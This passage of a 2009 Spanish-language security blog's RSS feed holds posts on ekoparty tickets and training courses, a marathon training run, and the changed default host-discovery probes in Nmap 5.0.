allowscriptaccess="always" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-483442466966802013?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/z1rW3--ABxg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/z1rW3--ABxg/fundar-sin-fundir.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/fundar-sin-fundir.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7674839859036153104</guid><pubDate>Wed, 09 Sep 2009 16:04:00 +0000</pubDate><atom:updated>2009-09-09T13:18:21.578-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ekoparty</category><title>ekoparty: Ultima Oportunidad!</title><description>&lt;div style="text-align: justify;"&gt;Los que todavía no tienen su entrada para la conferencia, o su lugar reservado en los trainings, solo les queda tiempo hasta este Viernes!&lt;br /&gt;&lt;br /&gt;Si no quieren esperar hasta la &lt;a href="http://www.ekoparty.org"&gt;ekoparty&lt;/a&gt; 2010 contáctense a &lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;organizacion@ekoparty.org&lt;/span&gt;&lt;/span&gt; y consulten por los descuentos disponibles.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SqfS-5u7mDI/AAAAAAAADDc/F25Y129vYHU/s1600-h/FlyerPlano.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 283px; height: 400px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SqfS-5u7mDI/AAAAAAAADDc/F25Y129vYHU/s400/FlyerPlano.jpg" alt="" id="BLOGGER_PHOTO_ID_5379500258008733746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Le pido a todos los amigos bloggers que posteen en sus blogs, recordándole a sus lectores los últimos días restantes para la &lt;a href="http://www.ekoparty.org"&gt;ekoparty&lt;/a&gt;!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.ekoparty.org"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;www.ekoparty.org&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7674839859036153104?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/WAvoGmSjRwI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/WAvoGmSjRwI/ekoparty-ultima-oportunidad.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/SqfS-5u7mDI/AAAAAAAADDc/F25Y129vYHU/s72-c/FlyerPlano.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/ekoparty-ultima-oportunidad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-172699441868561876</guid><pubDate>Mon, 07 Sep 2009 16:59:00 +0000</pubDate><atom:updated>2009-09-07T14:10:46.714-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Running</category><title>Camino a la Maratón!</title><description>&lt;div style="text-align: justify;"&gt;Ayer por la mañana corrí una carrera de 30km preparatoria para la Maratón de Buenos Aires en Octubre.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SqU8K-tlstI/AAAAAAAADDU/-M_L2a6TDtU/s1600-h/30K_9712.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SqU8K-tlstI/AAAAAAAADDU/-M_L2a6TDtU/s400/30K_9712.jpg" alt="" id="BLOGGER_PHOTO_ID_5378771489294496466" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Fueron mis primeros 30km, mi máxima distancia hasta el momento, anteriormente solo habia corrido dos media-maratones (21km). &lt;span style="font-weight: bold;"&gt;Mi tiempo fue de 02:44:35&lt;/span&gt;, corriendo a 05:29 el kilómetro.&lt;br /&gt;&lt;br /&gt;A esta carrera de 30km la sufri muchísimo, las ultimas semanas no venia entrenando mucho y a esto se sumo una lesion en una rodilla. Sin mencionar que el circuito de la carrera era muy aburrido, 3 vueltas de 10km en Costanera Sur...&lt;br /&gt;&lt;br /&gt;Lo positivo es que llegue!! :-) El tiempo que hice fue bastante bueno, en el estado físico en el que me encontraba y por otro lado es lo que habia planeado hacer.&lt;br /&gt;&lt;br /&gt;Nuevamente fue fundamental pertenecer a un grupo de corredores, los &lt;a style="font-weight: bold;" href="http://www.trotadoresurbanos.com.ar/"&gt;Trotadores Urbanos&lt;/a&gt;, que me brindaron toda la contención necesaria para cumplir con este objetivo. En particular quiero agradecer a Emanuel que me acompaño los últimos 10km de la carrera, gracias Ema!! :-)&lt;br /&gt;&lt;br /&gt;Próximo objetivo: &lt;a style="font-weight: bold;" href="http://www.maratondebuenosaires.com/"&gt;MARATON DE BUENOS AIRES&lt;/a&gt; (42km) !!!!!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-172699441868561876?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/-nN-P2jKNnE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/-nN-P2jKNnE/camino-la-maraton.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/SqU8K-tlstI/AAAAAAAADDU/-M_L2a6TDtU/s72-c/30K_9712.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/camino-la-maraton.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6755905850742273130</guid><pubDate>Wed, 02 Sep 2009 15:40:00 +0000</pubDate><atom:updated>2009-09-02T13:01:15.296-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Trainings</category><title>COMBAT training (NINJA edition)</title><description>&lt;div style="text-align: justify;"&gt;Nuevamente vuelve el &lt;span style="font-weight: bold;"&gt;COMBAT training&lt;/span&gt;! pero esta vez con una &lt;span style="font-weight: bold;"&gt;NINJA edition&lt;/span&gt; especialmente diseñada para la &lt;a href="http://www.ekoparty.org"&gt;&lt;span style="font-weight: bold;"&gt;ekoparty&lt;/span&gt;&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/Sp6U0Ovd7tI/AAAAAAAADCE/kyyHPuQgNNc/s1600-h/kung_pow_paralyzer.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 380px; height: 269px;" src="http://2.bp.blogspot.com/_8alnjaETaog/Sp6U0Ovd7tI/AAAAAAAADCE/kyyHPuQgNNc/s400/kung_pow_paralyzer.jpg" alt="" id="BLOGGER_PHOTO_ID_5376898630158249682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;El &lt;span style="font-weight: bold;"&gt;COMBAT training&lt;/span&gt; es un curso altamente práctico que en su versión clásica tiene una duración de 5 días. La &lt;span style="font-weight: bold;"&gt;NINJA edition&lt;/span&gt; del &lt;span style="font-weight: bold;"&gt;COMBAT training&lt;/span&gt;, toma lo mejor de la versión clásica pero en una edición aun mas práctica e intensiva de solo 2 días.&lt;br /&gt;&lt;br /&gt;Esta &lt;span style="font-weight: bold;"&gt;NINJA edition&lt;/span&gt; va a estar focalizada en técnicas de explotación y post-explotación, siempre utilizando el framework MetaSploit, y con un día completo sobre ataques del tipo Client Side que tan populares y efectivos son actualmente.&lt;br /&gt;&lt;br /&gt;Como en todos los &lt;span style="font-weight: bold;"&gt;COMBAT trainings&lt;/span&gt;, al final del curso se realizara una competencia de hacking en donde los alumnos implementarán todo lo aprendido. El ganador de esta competencia recibira una espada Ninja verdadera! &lt;span style="font-style: italic;"&gt;(no nos hacemos responsables de cualquier accidente que pueda llegar a ocurrir)&lt;/span&gt; el 2o y 3er puesto también recibirán armas orientales verdaderas que todavía no hemos definido ;-)&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.ekoparty.org/trainings_contenido.html"&gt;Mas INFO aquí!&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Tampoco puedo dejar de mencionar al resto de los cursos que seran dictados en la ekoparty. Me gustaría hacer notar que muchos de ellos solo se dictan 1 vez al año, durante la ekoparty, y hay otros que seran presentados por primera vez  en Latinoamerica!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;table style="text-align: left; margin-left: 0px; margin-right: auto;" border="1" cellpadding="0" cellspacing="0" width="100%"&gt;&lt;tbody&gt;                                 &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_immunity_breakwin09.html',%20'index_noticias');"&gt;                        Breaking Windows                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Damian Gomez, Immunity                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                 &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_base4combat09.html',%20'index_noticias');"&gt;                        COMBAT Training (NINJA edition)                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Leonardo Pigñer, BASE4 Security                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_moxie.html',%20'index_noticias');"&gt;                        Evaluating Secure Protocols and Intercepting Secure Communication                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Moxie Marlinspike                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                  &lt;tr&gt;                                   &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                                       &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                                           &lt;a href="javascript:llamarasincrono('training_argeniss01.html',%20'index_noticias');"&gt;                        Hacking and Defending Oracle Databases                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Esteban Martínez Fayó, ARGENISS                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_lockpick.html',%20'index_noticias');"&gt;                        Lockpicking &amp;amp; Physical Security - from novice to master in one day                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Deviant Ollam, TOOOL                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                 &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_immunity03.html',%20'index_noticias');"&gt;                       Programando Shellcode en Windows desde Cero                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Pablo Solé, Immunity                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_chema.html',%20'index_noticias');"&gt;                        Técnicas de Inyección (ciegas) en aplicaciones Web                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Chema Alonso, Informatica 64                    &lt;/div&gt;                  &lt;/td&gt;                                                                                         &lt;/tr&gt;                  &lt;tr&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div class="letracfp"&gt;&lt;div style="text-align: left;"&gt;                      &lt;a href="javascript:llamarasincrono('training_w3af.html',%20'index_noticias');"&gt;                       Web Testing &amp;amp; Exploiting Workshop                      &lt;/a&gt;&lt;/div&gt;                    &lt;/div&gt;                  &lt;/td&gt;                  &lt;td align="center"&gt;&lt;div style="text-align: left;"&gt;                    &lt;/div&gt;&lt;div style="text-align: left;" class="letracfp"&gt;                      Andrés Riancho, Bonsai                    &lt;/div&gt;                  &lt;/td&gt;                                                                                        &lt;/tr&gt;                &lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: left;"&gt;                      &lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;No es una oportunidad para dejar pasar y además en el costo esta incluida la entrada a la conferencia.&lt;br /&gt;&lt;br /&gt;Pueden hacer consultas a: &lt;span style="font-weight: bold;font-size:130%;" &gt;organizacion@ekoparty.org&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6755905850742273130?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/4FfPJpYMVQ4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/4FfPJpYMVQ4/combat-training-ninja-edition.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_8alnjaETaog/Sp6U0Ovd7tI/AAAAAAAADCE/kyyHPuQgNNc/s72-c/kung_pow_paralyzer.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/combat-training-ninja-edition.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-672754764617028563</guid><pubDate>Sun, 30 Aug 2009 23:53:00 +0000</pubDate><atom:updated>2009-11-09T19:33:19.088-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Nmap</category><title>Nmap actualiza su PING</title><description>&lt;div style="text-align: justify;"&gt;Dentro de los importantes cambios realizados a la nueva versión de Nmap (5.0) me sorprendió encontrar una nueva versión del famoso &lt;span style="font-style: italic;"&gt;"PING de Nmap"&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/SpsSHOmUP-I/AAAAAAAADBc/PQLOEzpO4rs/s1600-h/trinity-nmapscreen-hd-crop-1200x728.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 243px;" src="http://2.bp.blogspot.com/_8alnjaETaog/SpsSHOmUP-I/AAAAAAAADBc/PQLOEzpO4rs/s400/trinity-nmapscreen-hd-crop-1200x728.jpg" alt="" id="BLOGGER_PHOTO_ID_5375910495584010210" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;El &lt;span style="font-style: italic;"&gt;PING de Nmap&lt;/span&gt;, también conocido como &lt;span style="font-style: italic;"&gt;Ping Sweep&lt;/span&gt;, se encuentra dentro de la importante etapa de &lt;span style="font-style: italic;"&gt;host discovery&lt;/span&gt; que se encarga de descubrir los hosts vivos a los cuales realizaremos luego el escaneo de puertos. En la versión 5.0 de Nmap se ha optimizado este algoritmo para que sea mas eficiente, pero lo que no deja de atormentarme durante las noches es porque no lo han modificado años atras y si realmente este nuevo algoritmo posee la mejor combinación de pruebas a realizar... :-?&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://nmap.org/5/#changes"&gt;http://nmap.org/5/#changes&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"The host discovery (ping probe) defaults have been enhanced to   include twice as many probes.  The default is now "-PE -PS443 -PA80   -PP". In exhaustive testing of 90 different probes, this emerged as   the best four-probe combination, finding 14% more Internet hosts   than the previous default, "-PE -PA80". The default for non-root   users is -PS80,443, replacing the previous default of -PS80. In   addition, ping probes are now sent in order of effectiveness (-PE   first) so that less effective probes may not have to be sent. ARP   ping is still the default on local ethernet networks.  "&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Hasta que salió la versión 5.0, el PING de Nmap por default, consistia en enviar un ICMP echo-request (el clásico PING de ICMP) y un paquete ACK al puerto 80. Obviamente esto era efectivo muchos años atras cuando no existían firewalls stateful y los administradores no filtraban ICMP por default. (&lt;a href="http://kungfoosion.blogspot.com/2008/10/cmo-optimizar-el-host-discovery-en-nmap.html"&gt;Mas info aquí&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Ahora al PING anterior, que consistia en un ICMP echo-request y un ACK al puerto 80, le agregaron un paquete SYN al puerto 443 y un paquete ICMP timestamp-request. Según lo que dice la web de Nmap, después de realizar 90 pruebas diferentes, esta combinación permitió encontrar un 14% mas de hosts en Internet.&lt;br /&gt;&lt;br /&gt;Para mi la clave esta en la frase &lt;span style="font-style: italic;"&gt;"14% more Internet hosts"&lt;/span&gt;. Puedo decir que después de haber realizado muchos escaneos de puertos a lo largo de estos años, las redes argentinas y también latinoamericanas en Internet, son diferentes(puertos abiertos/cerrados/filtrados) al resto de redes en Internet de otros paises y obviamente representan un porcentaje sumamente chico del total de Internet.&lt;br /&gt;&lt;br /&gt;Probablemente este nuevo algoritmo sea el mas efectivo en toda la Internet, pero tal vez tengamos que customizarlo para que sea aun mas efectivo en algunas redes en particular. IMHO&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;Algunos posts relacionados:&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/10/cmo-optimizar-el-host-discovery-en-nmap.html"&gt;Cómo Optimizar el Host Discovery en Nmap&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/09/los-puertos-ms-usados-en-internet.html"&gt;Los Puertos Más Usados En Internet&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/06/nunca-confes-en-tus-herramientas.html"&gt;Nunca Confíes En Tus Herramientas&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/02/portbunny-y-la-guerra-de-los-port.html"&gt;PortBunny y la Guerra de los Port Scanners&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-672754764617028563?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/rYNnTgQiznY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/rYNnTgQiznY/nmap-actualiza-su-ping.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_8alnjaETaog/SpsSHOmUP-I/AAAAAAAADBc/PQLOEzpO4rs/s72-c/trinity-nmapscreen-hd-crop-1200x728.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/08/nmap-actualiza-su-ping.html</feedburner:origLink></item></channel></rss>
